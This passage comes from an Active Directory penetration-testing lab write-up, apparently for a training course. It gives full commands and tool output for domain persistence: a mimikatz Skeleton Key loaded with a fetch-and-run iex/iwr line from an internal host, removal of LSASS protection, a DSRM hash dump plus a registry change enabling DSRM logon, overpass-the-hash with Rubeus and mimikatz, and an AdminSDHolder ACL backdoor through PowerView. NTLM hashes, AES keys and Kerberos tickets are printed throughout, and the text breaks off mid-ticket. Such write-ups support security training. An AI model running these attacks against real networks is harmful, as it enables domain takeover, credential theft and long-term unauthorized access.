mqjQL6zLcSbZZn/s3CDsaJfjZK641Ue0HQsQ61mRoSy/sgu8dyt3YMr+pGKCGRgcl6aK/6+CLMpmm1WB
SPkwWbkvRV+2LXDVqHy4rSYC/kMnmP1CXOQF2h8o9vlBOHo5xy/IXHryXzno3HucqwtTHHevizOKOEzU
fZRyhs4HQOgUqXqjdgRKvMy1K1EFFdKBAoLaIIy7QuKWq8Un6ZKrsoUYWXA+jqSo646VOQXE6L0mvGQB
7U1l5jMQAplaJdptuS3jYY1vJ/VI07YP2y8+xmbwSXU/60sEei2DXIx0g8GoxvF3AgobQlVWMypNJsBq
2aQvsBvQ23ECL3ptj0sJbsH5G7hYCqYnJPanbcT70T0afUlIL0omArKXALCQUESZoMgojXTqwnIRpaXJ
5SrXbdvG1/Yg06xvHEFcnKyWuN3hGhgAAAD71dR5Uv9j2asE11Rm76cm+IzCtHPbvT79nVtqRuDNIxe/
a6/sFlRlh6VBF11KKJX/7BMUCHr//EpkvlC7cCxBuOWu5mKF4UuyKtz8bixnaXj7Q6/C1k5emJxj3Z8k
d1WBsD+gkJ5UeUWHkErqVmouMJQbU51v6vucNTwQxb7ql9URXI/BH2NHQ0/x15JCssJS/6JutnrZbVp4
wpWw8RbulVdWxjgDqFhXTdx7cKQJ+p1DBdiAlsqMisDim/tWfC6zsDB+Zf5Zr2QO1yi2JmMlDLEAaCSy
KBcaAvaoDx0lVHRthtK4p6uCeKni711pF6OkX2JZfXq8a/Q54ZRbCB3VGl8aasdUygKheyhs70sjuzJr
MDVjCL+zEi1viID6LlgpVeis2tfMvSNhHdAKBIldRHarDMnMvR9ltfeEm86xuM9KC/CfTszIvsGe3GVL
My8ASAHf3/1ww4lBlaG00BywGiKLJ7VKhBOY9PgnnO2B36vLp8JeTkh4z6Q58h+h6P6nO+2cJRUb1MCV
grQMlM8A1AXGtIl7Zxr+dNav/Vle0owIy2vC81pR4Mu3LsT+6z8eLW5tLc91It6VWIBr1KPVYniQLq2b
CQxBBAOKkJa0/KJ9BA8o4PtGRZfiqsP94pMWSZTFNvTxKgZQVyAMblKXsatstYniT7ScvJ1q/AHAxVi/
PMdHOZZv/7/QsSzClS3dcfcyAxJMRlI9/o3Rt9/2x4VcvkfbKXAyob4D8PU+5xbUVSLQzOxjXkkYH31b
tpLEioR0HHaQRq+V3+MMhwllHV6bTxyAfBNr9cc7mYtD9++VENHu4Qb3xZrIgKIyvJoJOP4Z0oR6Jn+J
ktmvo4IBEzCCAQ+gAwIBAKKCAQYEggECfYH/MIH8oIH5MIH2MIHzoCswKaADAgESoSIEIH3TYCj+/NId
sMdX+G9kFgoHEcxaQv5o/93HbS8Cw2/+oRwbGkRPTExBUkNPUlAuTU9ORVlDT1JQLkxPQ0FMohUwE6AD
AgEBoQwwChsIc3ZjYWRtaW6jBwMFAEDhAAClERgPMjAyNDA2MjgxNzE0MDJaphEYDzIwMjQwNjI5MDMx
NDAyWqcRGA8yMDI0MDcwNTE3MTQwMlqoHBsaRE9MTEFSQ09SUC5NT05FWUNPUlAuTE9DQUypLzAtoAMC
AQKhJjAkGwZrcmJ0Z3QbGkRPTExBUkNPUlAuTU9ORVlDT1JQLkxPQ0FM
[*] Target LUID: 0x714ed4
[+] Ticket successfully imported!

ServiceName : krbtgt/DOLLARCORP.MONEYCORP.LOCAL
ServiceRealm : DOLLARCORP.MONEYCORP.LOCAL
UserName : svcadmin
UserRealm : DOLLARCORP.MONEYCORP.LOCAL
StartTime : 6/28/2024 10:14:02 AM
EndTime : 6/28/2024 8:14:02 PM
RenewTill : 7/5/2024 10:14:02 AM
Flags : name_canonicalize, pre_authent, initial, renewable, forwardable
KeyType : aes256_cts_hmac_sha1
Base64(key) : fdNgKP780h2wx1f4b2QWCgcRzFpC/mj/3cdtLwLDb/4=
ASREP (key) : 6366243A657A4EA04E406F1ABC27F1ADA358CCD0138EC5CA2835067719DC7011
A new command prompt opens with Domain Administrator (svcadmin) privileges. We now use the Invoke-
MimiEx.ps1 to execute the attack.
C:\Windows\system32>C:\AD\Tools\InviShell\RunWithPathAsAdmin.bat
C:\Windows\system32>set COR_ENABLE_PROFILING=1
C:\Windows\system32>set COR_PROFILER={cf0d821e-299b-5307-a3d8-b283c03916db}

C:\Windows\system32>set COR_PROFILER_PATH=C:\AD\Tools\InviShell\InShellProf.dll

C:\Windows\system32>powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows

PS C:\Windows\system32> Enter-PSSession -ComputerName dcorp-dc.dollarcorp.moneycorp.local

[dcorp-dc.dollarcorp.moneycorp.local]: PS C:\Users\svcadmin\Documents> iex (iwr -UseBasicParsing
http://172.16.100.163/Invoke-MimiEx.ps1)
[dcorp-dc.dollarcorp.moneycorp.local]: PS C:\Users\svcadmin\Documents> Invoke-Mimi -Command
'"privilege::debug" "misc::skeleton"'

.#####. mimikatz 2.2.0 (x64) #19041 Dec 23 2022 18:36:14

.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( [email protected] )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/
mimikatz(powershell) # privilege::debug
Privilege '20' OK

mimikatz(powershell) # misc::skeleton
[KDC] data
[KDC] struct
[KDC] keys patch OK
[RC4] functions
[RC4] init patch OK
[RC4] decrypt patch OK

[dcorp-dc.dollarcorp.moneycorp.local]: PS C:\Users\svcadmin\Documents> exit

Now we will open a normal command prompt and create a credential object with the username as
svcadmin and the password as Mimikatz.
PS C:\Windows\system32> $Credential = Get-Credential

cmdlet Get-Credential at command pipeline position 1

Supply values for the following parameters:
Credential
PS C:\Windows\system32> Invoke-Command -ComputerName dcorp-dc.dollarcorp.moneycorp.local -
ScriptBlock { $env:username;$env:computername } -Credential $Credential
svcadmin
DCORP-DC

It is better not to use this technique in the real test scenarios.

In case if lsass is running as a protected process, then the attack can still be used, however it needs the
mimikatz driver (mimidriv.sys) on the disk of the target DC.
mimkatz# privilege::debug
mimkatz# !+
mimkatz# !processprotect /process:lsass.exe /remove
mimkatz# misc::skeleton
mimkatz# !-

Persistence
Rebooting a domain controller will remove this malware and it will have to be redeployed by the attacker.

DSRM attack
DSRM is Directory services restore mode.

The DSRM administrator account is the only local user account on a domain controller (DC). This account
is not accessible when the DC is booted into normal mode. As its name implies, the account can only be
used when the DC is booted into Directory Services Restore Mode.

DSRM (Safe mode password) is required when a server is required when a server is promoted to domain
controller and rarely used.

After altering the configuration on the DC, it is possible to pass the NTLM hash of this user to access the
DC.

To dump the DSRM password, domain administrator privileges are required.

The persistence is very long, since the DSRM password is reset very rarely.
[dcorp-dc.dollarcorp.moneycorp.local]: PS C:\Users\svcadmin\Documents> Invoke-Mimi -Command
'"token::elevate""lsadump::sam"'

.#####. mimikatz 2.2.0 (x64) #19041 Dec 23 2022 18:36:14

.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( [email protected] )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(powershell) # token::elevate
Token Id : 0
User name :
SID name : NT AUTHORITY\SYSTEM

620 {0;000003e7} 1 D 18484 NT AUTHORITY\SYSTEM S-1-5-18 (04g,21p)

Primary
-> Impersonated !
* Process Token : {0;01677997} 0 D 23559029 dcorp\svcadmin S-1-5-21-719815819-3726368948-
3917688648-1118 (12g,26p) Primary
* Thread Token : {0;000003e7} 1 D 31155148 NT AUTHORITY\SYSTEM S-1-5-18 (04g,21p)
Impersonation (Delegation)

mimikatz(powershell) # lsadump::sam
Domain : DCORP-DC
SysKey : bab78acd91795c983aef0534e0db38c7
Local SID : S-1-5-21-627273635-3076012327-2140009870

SAMKey : f3a9473cb084668dcf1d7e5f47562659

RID : 000001f4 (500)

User : Administrator
Hash NTLM: a102ad5753f4c441e3af31c97fad86fd

RID : 000001f5 (501)

User : Guest

RID : 000001f7 (503)

User : DefaultAccount

RID : 000001f8 (504)

User : WDAGUtilityAccount

We can use the pass the hash to authenticate. However, we need to change the logon behavior of the
DSRM administrator.

The following registry must be modified to enable this functionality:

• KEY NAME:

HKLM\System\CurrentControlSet\Control\Lsa

• Entry Name:

DsrmAdminLogonBehavior

• Type:

REG_DWORD

• Value: 0, 1 or 2

0 – DSRM Administrator can log on only in the DSRM Mode. This is the default behavior.

1 – DSRM Administrator can log on when NTDS is stopped.

2 – DSRM Administrator can log on to domain controller anytime.

[dcorp-dc.dollarcorp.moneycorp.local]: PS C:\Users\svcadmin\Documents> Set-ItemProperty -Path
"HKLM:\System\CurrentControlSet\Control\LSA" -Name "DSRMLogonBehavior" -Value 2
[dcorp-dc.dollarcorp.moneycorp.local]: PS C:\Users\svcadmin\Documents> Get-ItemProperty -Path
"HKLM:\System\CurrentControlSet\Control\LSA" -Name "DSRMLogonBehavior"

DSRMLogonBehavior : 2
PSPath :
Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\LSA
PSParentPath :
Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control
PSChildName : LSA
PSDrive : HKLM
PSProvider : Microsoft.PowerShell.Core\Registry
Now we can execute an OverPass the Hash attack to login as the DSRM administrator.
C:\Windows\system32>C:\Ad\Tools\InviShell\RunWithPathAsAdmin.bat

C:\Windows\system32>set COR_ENABLE_PROFILING=1

C:\Windows\system32>set COR_PROFILER={cf0d821e-299b-5307-a3d8-b283c03916db}

C:\Windows\system32>set COR_PROFILER_PATH=C:\AD\Tools\InviShell\InShellProf.dll

C:\Windows\system32>powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows

PS C:\Windows\system32> . C:\Ad\Tools\Invoke-MimiEx.ps1
PS C:\Windows\system32> Invoke-Mimi -Command '"sekurlsa::pth /domain:dcorp-dc /user:Administrator
/ntlm:a102ad5753f4c441e3af31c97fad86fd /run:powershell.exe"'

.#####. mimikatz 2.2.0 (x64) #19041 Dec 23 2022 18:36:14

.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( [email protected] )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(powershell) # sekurlsa::pth /domain:dcorp-dc /user:Administrator

/ntlm:a102ad5753f4c441e3af31c97fad86fd /run:powershell.exe
user : Administrator
domain : dcorp-dc
program : powershell.exe
impers. : no
NTLM : a102ad5753f4c441e3af31c97fad86fd
| PID 3252
| TID 3216
| LSA Process is now R/W
| LUID 0 ; 845302 (00000000:000ce5f6)
\_ msv1_0 - data copy @ 000001B68D883570 : OK !
\_ kerberos - data copy @ 000001B68DD675A8
\_ aes256_hmac -> null
\_ aes128_hmac -> null
\_ rc4_hmac_nt OK
\_ rc4_hmac_old OK
\_ rc4_md4 OK
\_ rc4_hmac_nt_exp OK
\_ rc4_hmac_old_exp OK
\_ *Password replace @ 000001B68E2FBAA8 (32) -> null

A new PowerShell session that opens.

PS C:\Windows\System32>ls \\dcorp-dc.dollarcorp.moneycorp.local\c$
Directory: \\dcorp-dc.dollarcorp.moneycorp.local\c$
Mode LastWriteTime Length Name
---- ------------- ------ ----
05/08/2021 12:20 AM <DIR> PerfLogs
11/14/2022 10:12 PM <DIR> Program Files
05/08/2021 01:40 AM <DIR> Program Files (x86)
03/03/2023 08:19 AM <DIR> Users
11/11/2022 09:58 PM <DIR> Windows

Persistence
The persistence is very long, since the DSRM password is reset very rarely.

Persistence using ACL

AdminSDHolder
AdminSDHolder is a security feature in Active Directory (AD) designed to protect the security descriptors
of high-privilege accounts and groups, ensuring their permissions cannot be easily altered by unauthorized
users. This mechanism plays a crucial role in maintaining the security and integrity of AD environments.

What is AdminSDHolder?

• Location: The AdminSDHolder object is located in the System container of the AD domain.

o Distinguished Name (DN): CN=AdminSDHolder,CN=System,DC=<domain>,DC=<com>

• Purpose: It acts as a template for security descriptors that are applied to protected groups and
their members.

• SDProp (Security Descriptor Propagator): A background process that runs every 60 minutes and
ensures that the security descriptors of protected accounts and groups match those of the
AdminSDHolder object.

List of the protected groups

• Account Operators

• Backup Operators

• Server Operators

• Print Operators

• Domain Admins

• Replicator

• Enterprise Admins

• Domain Controllers

• Read-Only Domain Controllers

• Schema Admins

• Administrators

When a user or group is added to one of these protected groups, the SDProp process applies the security
descriptors from AdminSDHolder to ensure consistency and protection.
How AdminSDHolder Works

1. Initial Setup: The AdminSDHolder object is created during the installation of AD. It contains a
default security descriptor template.

2. Membership Tracking: AD tracks membership of the protected groups.

3. SDProp Process:

o Runs every 60 minutes.

o Checks the security descriptors of the protected accounts and groups.

o Compares them to the template in the AdminSDHolder object.

o Updates the security descriptors of the protected accounts and groups to match the
AdminSDHolder template.

Using AdminSDHolder
Since Security Descriptor Propagator runs every hour to prevent the accidental and unintended
modifications, even the addition of Generic All rights on any of the Protected Accounts cannot be used
for persistence. The technique is to add the Generic All rights on the System Container AdminSDHolder.
For this we need Domain administrator privileges.

We will open a command prompt session with Domain Administrator privileges using an OverPass the
Hash attack.
C:\Windows\system32>C:\Ad\Tools\Rubeus.exe asktgt /user:svcadmin
/aes256:6366243a657a4ea04e406f1abc27f1ada358ccd0138ec5ca2835067719dc7011 /opsec
/createnetonly:cmd.exe /show /ptt

______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/

v2.2.1

[*] Action: Ask TGT

[*] Showing process : True

[*] Username : C7VIN1FF
[*] Domain : 51ZKXSPD
[*] Password : YM58PIQG
[+] Process : 'cmd.exe' successfully created with LOGON_TYPE = 9
[+] ProcessID : 1560
[+] LUID : 0x1000ac

[*] Using domain controller: dcorp-dc.dollarcorp.moneycorp.local (172.16.2.1)

[!] Pre-Authentication required!
[!] AES256 Salt: DOLLARCORP.MONEYCORP.LOCALsvcadmin
[*] Using aes256_cts_hmac_sha1 hash:
6366243a657a4ea04e406f1abc27f1ada358ccd0138ec5ca2835067719dc7011
[*] Building AS-REQ (w/ preauth) for: 'dollarcorp.moneycorp.local\svcadmin'
[*] Target LUID : 1048748
[*] Using domain controller: 172.16.2.1:88
[+] TGT request successful!
[*] base64(ticket.kirbi):

doIGAjCCBf6gAwIBBaEDAgEWooIE2TCCBNVhggTRMIIEzaADAgEFoRwbGkRPTExBUkNPUlAuTU9ORVlD
T1JQLkxPQ0FMoi8wLaADAgECoSYwJBsGa3JidGd0GxpET0xMQVJDT1JQLk1PTkVZQ09SUC5MT0NBTKOC
BHUwggRxoAMCARKhAwIBAqKCBGMEggRf1Avw+cvZLvgysa8WfwEurLUb4rn5A8MGki2snzcD/vKM8dnk
75nmYXUGalcv0b1BCf4s5Pa79nraJdaeFdLp5wuEugVwAK3YL44x5h69Up9yOoRCkqX/ax1D2q7g9pma
I3JJ5toVCOBxvcFeu8Diqj16NpcaEboi8fwjZd268TFla6op8rcIN8ouyropbQA7e3p0IMn0Y9JPJhbh
1aBJeM4uCoGRsQwMND1q/67U8sxqsWFQreguhmTbLKwJDS2sgO01iO5hWbsFIkcorXwhcn8WOOq9BFt5
TD6YznedgAu+GGkGhW4ELVoeXXavetBrPZ/8S9t8Ulv7mVAjoFTF/Vml0dzQLL2FuDSJ88efzzYzhu+E
IWA+Da4GRgNECEFjse1ZhyJ74LobStWHk6DgY1eYa8Y17ZZpLGjN18Z4OKJQzbwMaIZJ4xMEW31oGa9p
pFZzCaNNdHtlwS/l8SteqDm9tj0Lu4Bo3PPP2kg8HZGMAPBgf4ifDwUEKjyD8sHhGaA9Uxq4RrFUxCS3
2Zu4rfPaPO2Vh49+MySQWJK4msmXO15QDIDtsdAC3gqyB3wce7SWuwVBE9fl+SqYDkDViXNhrQGUHqIw
WUUt/hjlCALyL4i3XXOyXfSu0eV+YrwSCuhG5hpYhXPnPjPsZmuSwjRJQRcpdCKCj2FLEyxSEOCbhdG4
44DxMlQzK4feWyEwKvPFVpSfH/qFwIZHBFL5vLZ5Wg6ef7Z7fEnTmcsGo/eoOQNxtfD0lAdlv0WxXW3Y
QyhDINu3yU5ObTr9CvB3DYStHhj2hSNmRYmAkLoE+agn8yuja4dGrLO3DA5NFC+a7VwHl93LOY+UzuOc
orVEOCUEDZa+7zoA1FHwqNAh8X8rqqsJdFlNDshda5c4tmgce8NCUb+rXzddybDMx4dSeIfbogfZ2gLP
6aVLaFBhcW8GK3bq1XDxMGX6drGdpHfpENTDXfXdSA1M/cDJoj7MCnIzo+RPdPKOMe8eA0RGiR8kdPj3
Qgmrf7fiw5G9+5QZtj09ICEAOVAEKWVj4FJeV5q8bnx//2xnBG/WwbwbqHGHRx4JmrmtNYASSJGqnjSs
+6a8KrbnomSe5zzxIG9T4cqBbiZcG2soAmNZVfGVhFqSk3K8sMFpO0nWYhFMBslss97c0HKybAcLTBB8
zTqaXBzCexTt4ElQQ0X+miJdN229WwZKGmVt6xoDjIQw1a7aETr8CimUyWOSQBGXTfz9FPE1megXIUzT
4gjkbLj7Jfm8c5W6l3q4ZpwtO4bhucKlHDEeXk+nOpk33UGQVsB9aPst0+J94Xmhw2Aqtrh+iuqGp2n1
vOMKK00ksqZK/gbA1ZMeBpzG2d34eZUQ0h5gnZNO0y7r3fZN8RnDtCxRI/x/YJXwIn6tblaO0mA8fhtt
/hhSn3oCW+5w50s5DzvnuUei+jAX3g3sGB7j9IgL8jLMe9rflkWNaBD14yrOJqTanD87j9K6WIbbdW1e
5aB6o4IBEzCCAQ+gAwIBAKKCAQYEggECfYH/MIH8oIH5MIH2MIHzoCswKaADAgESoSIEIOW1m25rSl8U
gRU0GSnDvKhPY+4g3Sv1O8imm/CKQwomoRwbGkRPTExBUkNPUlAuTU9ORVlDT1JQLkxPQ0FMohUwE6AD
AgEBoQwwChsIc3ZjYWRtaW6jBwMFAEDhAAClERgPMjAyNDA3MDExNzMyMjVaphEYDzIwMjQwNzAyMDMz
MjI1WqcRGA8yMDI0MDcwODE3MzIyNVqoHBsaRE9MTEFSQ09SUC5NT05FWUNPUlAuTE9DQUypLzAtoAMC
AQKhJjAkGwZrcmJ0Z3QbGkRPTExBUkNPUlAuTU9ORVlDT1JQLkxPQ0FM
[*] Target LUID: 0x1000ac
[+] Ticket successfully imported!

ServiceName : krbtgt/DOLLARCORP.MONEYCORP.LOCAL
ServiceRealm : DOLLARCORP.MONEYCORP.LOCAL
UserName : svcadmin
UserRealm : DOLLARCORP.MONEYCORP.LOCAL
StartTime : 7/1/2024 10:32:25 AM
EndTime : 7/1/2024 8:32:25 PM
RenewTill : 7/8/2024 10:32:25 AM
Flags : name_canonicalize, pre_authent, initial, renewable, forwardable
KeyType : aes256_cts_hmac_sha1
Base64(key) : 5bWbbmtKXxSBFTQZKcO8qE9j7iDdK/U7yKab8IpDCiY=
ASREP (key) : 6366243A657A4EA04E406F1ABC27F1ADA358CCD0138EC5CA2835067719DC7011

A new command prompt open. In that new session, we will add the "Generic All" rights on the System
Container AdminSDHolder to our student user (student163).
C:\Windows\system32>C:\AD\Tools\InviShell\RunWithPathAsAdmin.bat

C:\Windows\system32>set COR_ENABLE_PROFILING=1

C:\Windows\system32>set COR_PROFILER={cf0d821e-299b-5307-a3d8-b283c03916db}

C:\Windows\system32>set COR_PROFILER_PATH=C:\AD\Tools\InviShell\InShellProf.dll

C:\Windows\system32>powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows

PS C:\Windows\system32> . C:\Ad\Tools\PowerView.ps1
PS C:\Windows\system32> Add-ObjectAcl -TargetIdentity
'CN=AdminSDHolder,CN=System,DC=dollarcorp,DC=moneycorp,DC=local' -PrincipalIdentity student163 -
Verbose -Rights All -PrincipalDomain dollarcorp.moneycorp.local -TargetDomain
dollarcorp.moneycorp.local
VERBOSE: [Get-DomainObject] Get-DomainObject filter string:
(|(|(samAccountName=student163)(name=student163)(displayname=student163)))
VERBOSE: [Get-DomainSearcher] search base:
LDAP://DCORP-DC.DOLLARCORP.MONEYCORP.LOCAL/DC=dollarcorp,DC=moneycorp,DC=local
VERBOSE: [Invoke-LDAPQuery] filter string:
(&(|(|(samAccountName=student163)(name=student163)(displayname=student163))))
VERBOSE: [Get-DomainObject] Error disposing of the Results object: Method invocation failed
because
[System.DirectoryServices.SearchResult] does not contain a method named 'dispose'.
VERBOSE: [Get-DomainObject] Get-DomainObject filter string:
(|(distinguishedname=CN=AdminSDHolder,CN=System,DC=dollarcorp,DC=moneycorp,DC=local))
VERBOSE: [Get-DomainSearcher] search base:
LDAP://DCORP-DC.DOLLARCORP.MONEYCORP.LOCAL/DC=dollarcorp,DC=moneycorp,DC=local
VERBOSE: [Invoke-LDAPQuery] filter string:
(&(|(distinguishedname=CN=AdminSDHolder,CN=System,DC=dollarcorp,DC=moneycorp,DC=local)))
VERBOSE: [Get-DomainObject] Error disposing of the Results object: Method invocation failed
because
[System.DirectoryServices.SearchResult] does not contain a method named 'dispose'.
VERBOSE: [Add-DomainObjectAcl] Granting principal
CN=student163,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local 'All' on
CN=AdminSDHolder,CN=System,DC=dollarcorp,DC=moneycorp,DC=local
VERBOSE: [Add-DomainObjectAcl] Granting principal
CN=student163,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local rights
GUID '00000000-0000-0000-0000-000000000000' on
CN=AdminSDHolder,CN=System,DC=dollarcorp,DC=moneycorp,DC=local

Since the SDProp process runs every 60 minutes, we will execute the Invoke-SDPropagator.ps1 script
manually to apply the changes immediately without waiting for the scheduled interval.
PS C:\Windows\system32> $session_dc = New-PSSession -ComputerName dcorp-
dc.dollarcorp.moneycorp.local
PS C:\Windows\system32> Invoke-Command -Session $session_dc -FilePath C:\Ad\Tools\Invoke-
SDPropagator.ps1
PS C:\Windows\system32> Invoke-Command -Session $session_dc -ScriptBlock {Invoke-SDPropagator -
timeoutMinutes 1 -showProgress -Verbose}
VERBOSE: PDC Located at dcorp-dc.dollarcorp.moneycorp.local
VERBOSE: Initiating SD Propogation on dcorp-dc.dollarcorp.moneycorp.local
VERBOSE: Checking for start of SD Propagator

Now we can check the permissions of our student User (student163) on the group Domain Admins.
PS C:\Windows\system32> Get-ObjectAcl -SamAccountName "Domain Admins" -ResolveGUIDs | foreach {$_
| Add-Member NoteProperty 'IdentityName' $(Convert-SidToName $_.SecurityIdentifier);$_} | ?
{$_.IdentityName -match 'student163' }

AceType : AccessAllowed
ObjectDN : CN=Domain Admins,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
ActiveDirectoryRights : GenericAll
OpaqueLength : 0
ObjectSID : S-1-5-21-719815819-3726368948-3917688648-512
InheritanceFlags : None
BinaryLength : 36
IsInherited : False
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-13603
AccessMask : 983551
AuditFlags : None
AceFlags : None
AceQualifier : AccessAllowed
IdentityName : dcorp\student163

Now we have Generic All rights on Domain Admins group. We can add the users to this group when
required.

This can also be accomplished using the Active Directory module and RACE toolkit.

Persistence
The persistence using AdminSDHolder can last indefinitely, as long as the Security Descriptor Propagator
(SDProp) process is active and no changes are made to the AdminSDHolder object or the attacker's
permissions.

Rights Abuse
There are even more interesting ACLs which can be abused. If we have Domain Administrator privileges,
the ACL for the Domain root can be modified to provide useful rights like Full Control or the ability to run
DCSync.

For this we will open a command prompt with administrative privileges.

C:\Windows\system32>C:\Ad\Tools\Rubeus.exe asktgt /user:svcadmin
/aes256:6366243a657a4ea04e406f1abc27f1ada358ccd0138ec5ca2835067719dc7011 /opsec
/createnetonly:cmd.exe /show /ptt

______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/

v2.2.1

[*] Action: Ask TGT

[*] Showing process : True

[*] Username : TTW95PEJ
[*] Domain : 89B3Z8Y2
[*] Password : K4IDDNM1
[+] Process : 'cmd.exe' successfully created with LOGON_TYPE = 9
[+] ProcessID : 3896
[+] LUID : 0x17ae61
[*] Using domain controller: dcorp-dc.dollarcorp.moneycorp.local (172.16.2.1)
[!] Pre-Authentication required!
[!] AES256 Salt: DOLLARCORP.MONEYCORP.LOCALsvcadmin
[*] Using aes256_cts_hmac_sha1 hash:
6366243a657a4ea04e406f1abc27f1ada358ccd0138ec5ca2835067719dc7011
[*] Building AS-REQ (w/ preauth) for: 'dollarcorp.moneycorp.local\svcadmin'
[*] Target LUID : 1551969
[*] Using domain controller: 172.16.2.1:88
[+] TGT request successful!
[*] base64(ticket.kirbi):

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
